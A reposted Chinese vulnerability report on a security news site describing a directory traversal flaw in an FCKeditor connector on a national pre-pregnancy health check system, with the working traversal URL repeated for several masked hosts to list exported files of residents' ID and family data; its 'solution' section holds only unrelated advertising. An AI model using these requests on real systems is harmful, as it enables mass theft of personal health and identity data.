频道栏目
首页 > 安全 > 网络安全 > 正文

某国家级通用型健康检查系统存在任意文件遍历/下载(泄露居民身份证/家属信息涉及全国数据可高达上百GB)

2016-07-13 15:25:30           
收藏   我要投稿

某国家级通用型健康检查系统存在任意文件遍历/下载(泄露居民身份证/家属信息涉及全国数据可高达百GB)。

系统:国家免费孕前优生健康检查项目医疗服务信息系统

 

QQ图片20160410084142.png

 

fck编辑器为题,其他页面都删除了,但存在一个便利目录的地址:

**.**.**.**:9202//FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../

 

QQ图片20160410081921.png

 

这个系统在export文件夹中会存储大量的XLS文件,里面都是居民档案信息,可知道web路径就可把这些文件全部下载,泄露信息,危害严重。

 

QQ图片20160410082201.png

 

 

QQ图片20160410082231.png

 

 

QQ图片20160410082411.png

 

下载(泄露居民身份证/家属信息涉及全国数据可高达百GB)。文件数据量极大,

 

QQ图片20160410082445.png

 

 

QQ图片20160410082553.png

 

 

QQ图片20160410082653.png

 

其他案例具存在:

 

QQ图片20160410082839.png

 

 

QQ图片20160410082812.png

 

是通用漏洞吗。

案例:

**.**.**.**:9202//FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export

**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export

**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export/

**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export

**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export

**.**.**.**/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../export

解决方案:

网络编辑必备工具箱,网络编辑之家(www.editorsky.com)荣誉出品

文章格式化编辑

繁简体相互转换

文字挑错功能(1000个错别字词库)

可定制段前是否空格

只需鼠标点击

全傻瓜式操作

文字挑错实例:洁白无暇(洁白无瑕),黄梁美梦(黄粱美梦),美仑美奂(美伦美奂)

上一篇:揭开苹果EFI固件密码重置与SCBO文件的神秘面纱
下一篇:Jenkins RCE 2(CVE-2016-0788)分析及利用
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站